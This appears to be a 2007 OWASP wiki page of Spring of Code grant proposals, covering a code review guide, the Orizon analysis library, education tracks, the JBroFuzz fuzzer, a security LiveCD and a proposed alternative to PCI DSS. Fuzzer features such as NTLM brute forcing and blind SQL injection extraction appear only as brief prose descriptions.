Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers<br />
and/or programming languages, and also provide OpenPGP De/Encryption support.<br />
<br />
<br />
=== Why should I be selected ===<br />
<br />
I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the<br />
international security community, and I firmly believe Enigform is my greatest idea so far.<br />
<br />
== Eoin Keary - Code review Project ==<br />
* '''Executive Summary''':<br />
I am proposing that I complete the OWASP Code review guide during this period.<br />
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners. <br />
<br />
I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.<br />
<br />
There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.<br />
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.<br />
<br />
The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.<br />
Code review methodologies also need to be discussed.<br />
<br />
<br />
* '''Objectives and Deliverables''':<br />
<br />
Update of the code review guide:<br />
* Add additional areas relating to the code review process such as:<br />
** Benefits and pitfalls<br />
** Methodology<br />
** The code review process<br />
*** Transactional analysis<br />
*** Managing the code review process<br />
*** Assigning risk to findings<br />
<br />
** Technical guides<br />
*** Language specific best practice <br />
*** Java <br />
*** .NET <br />
*** PHP <br />
*** MySQL <br />
*** Stored Procs <br />
*** C/C++ <br />
<br />
** Code review by vulnerability:<br />
*** Reviewing Code for Buffer Overruns and Overflows <br />
*** Reviewing Code for OS Injection<br />
*** Reviewing Code for SQL Injection<br />
*** Reviewing Code for Data Validation<br />
*** Reviewing code for XSS issues<br />
*** Reviewing Code for Error Handling<br />
*** Reviewing Code for Logging Issues<br />
*** Reviewing The Secure Code Environment<br />
*** Reviewing code for Authorization Issues<br />
*** Reviewing code for Authentication Issues<br />
*** Reviewing code for Session Integrity<br />
*** Reviewing code for Cross Site Request Forgery<br />
*** Reviewing code for Cryptography implementation issues<br />
*** Reviewing code Dangerous HTTP Methods (Deployment)<br />
*** Race Conditions <br />
<br />
The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.<br />
<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
<br />
I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process. <br />
I also was the lead of the Testing guide until V2 was published via the Autumn of Code. <br />
<br />
I have always delivered any work I have volunteered for on time. <br />
<br />
I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.<br />
<br />
== Paolo Perego - Owasp Orizon Project ==<br />
* '''Executive Summary''':<br />
Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.<br />
<br />
I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.<br />
<br />
Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.<br />
<br />
I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.<br />
<br />
<br />
* '''Objectives and Deliverables''':<br />
Completing the static code review API section<br />
* improving programming language to XML translator<br />
* improving security best practices code review scan library<br />
* improving secure coding fashion best practices library<br />
* writing the pattern matching scan using the aformentioned libraries<br />
Writing the java source code enforment objects<br />
* writing an object to handle form data values to avoid XSS<br />
* writing an object to handle form data values to avoid SQL Injection<br />
* writing an object to handle HttpRequest and HttpSession objects<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.<br />
<br />
I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.<br />
I'm a developer too so I understand also the "dark side" of the problem developing code with security in mind.<br />
<br />
I work using the "release early release often" paradigm so to be concrete and let other people having something usable to work with.<br />
<br />
== Sebastien Deleersnyder - OWASP Education Project ==<br />
* '''Executive Summary''':<br />
This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences. <br />
<br />
Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience. <br />
<br />
* '''Objectives and Deliverables''':<br />
Currently the project goals are to create Educational Tracks: <br />
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past<br />
* A "Web Application Security Primer" Track for beginners (4 hours) <br />
* A "What developers should know on Web Application Security" Track for developers (4 hours) <br />
<br />
* '''Why you should be sponsored for the project''': <br />
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.<br />
<br />
This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.<br />
<br />
If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.<br />
<br />
* '''More details''': <br />
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.<br />
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.<br />
<br />
== Subere - OWASP JBroFuzz Project ==<br />
<br />
==== Overview ==== <br />
<br />
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.<br />
<br />
==== Fuzzing ==== <br />
<br />
As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.<br />
<br />
==== Objectives ==== <br />
<br />
JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):<br />
<br />
* '''Open Source Tab'''<br />
* '''NTLM Brute Force over HTTP/S Tab'''<br />
* '''Pure HTTP/S Fuzzing using HTTPClient'''<br />
* '''Blind SQL Injection Fuzzing Tab'''<br />
<br />
At the same time, the following existing tabs need to be updated and made more robust (details in next section):<br />
<br />
* '''TCP Fuzzing tab allowing graph outputs'''<br />
* '''TCP Sniffing tab update thread Agent Queue'''<br />
* '''Update Generators file format'''<br />
* '''Include SOAP and XML fuzzing'''<br />
<br />
This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.<br />
<br />
==== Deliverables ==== <br />
<br />
Based on the above, the new code elements that will be added are as follows:<br />
<br />
* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''<br />
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''<br />
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''<br />
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''<br />
<br />
For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: <br />
<br />
* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''<br />
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''<br />
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''<br />
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''<br />
<br />
Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.<br />
<br />
==== Background ==== <br />
<br />
In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months. <br />
<br />
Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.<br />
<br />
I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.<br />
<br />
==== Why should JBroFuzz be sponsored? ==== <br />
<br />
Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.<br />
<br />
Keep the code platform independent adds a huge advantage. <br />
<br />
Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.<br />
<br />
== Joshua Perrymon - OWASP LiveCD Project ==<br />
* '''Executive Summary''':<br />
I am proposing that I complete the second version of the OWASP LiveCD during this period.<br />
The first version of the LiveCD is now available and include many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security proffesionals to perform application testing and training. <br />
<br />
In the current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This shouls start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also inlcude the wiki and ALL the tools developed for OWASP.<br />
<br />
* '''Objectives and Deliverables''':<br />
<br />
Update of the LiveCD:<br />
* Complete OWASP branding<br />
* Add OWASP wiki<br />
* Add encryption capabilities<br />
* Add more OWASP tools<br />
* Add more pen-test tools such as;<br />
VOIP, RFID, BlueTooth, Wireless, etc..<br />
<br />
<br />
* '''Why I should be sponsored for the project''':<br />
<br />
I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference in the OWASP liveCD vs. other live CDs is going to be the regularity of updates. If sponsorship can be obtained the CD could be updated on a monthly basis. Not once a year like other liveCDs. The CD will also include specialty tools and documentation to perform VOIP, RFID,Bluetooth, and wireless security assessments.<br />
<br />
<br />
----<br />
<br />
'''Mark Curphey – A Better Web Security Evaluation Criteria'''<br />
<br />
'''Problem''' <br />
PCI DSS is attracting a lot of criticism for a lot of valid reasons. <br />
http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/<br />
<br />
http://blogs.csoonline.com/node/210<br />
<br />
http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html<br />
<br />
The list is of course long and not appropriate here……<br />
<br />
'''Solution and Deliverables'''<br />
As opposed to continuing to say what’s wrong with PCI DSS, it seems to me that OWASP is a perfect forum to create and publish a “better criteria”. This can either be adopted and implemented by an organization like OWASP or considered to be incorporated into the PCI or other security standards. This project would address the;<br />
<br />
'''Standard''' <br />
-The technical things people should care about<br />
-The operational / management things people should care about<br />
'''Business Model''' <br />
-A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc)<br />
<br />
Note: This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish to complete but I think is very important for the industry and for potentially for OWASP. I wanted to gauge the interest by first posting this.</div>Mcurphey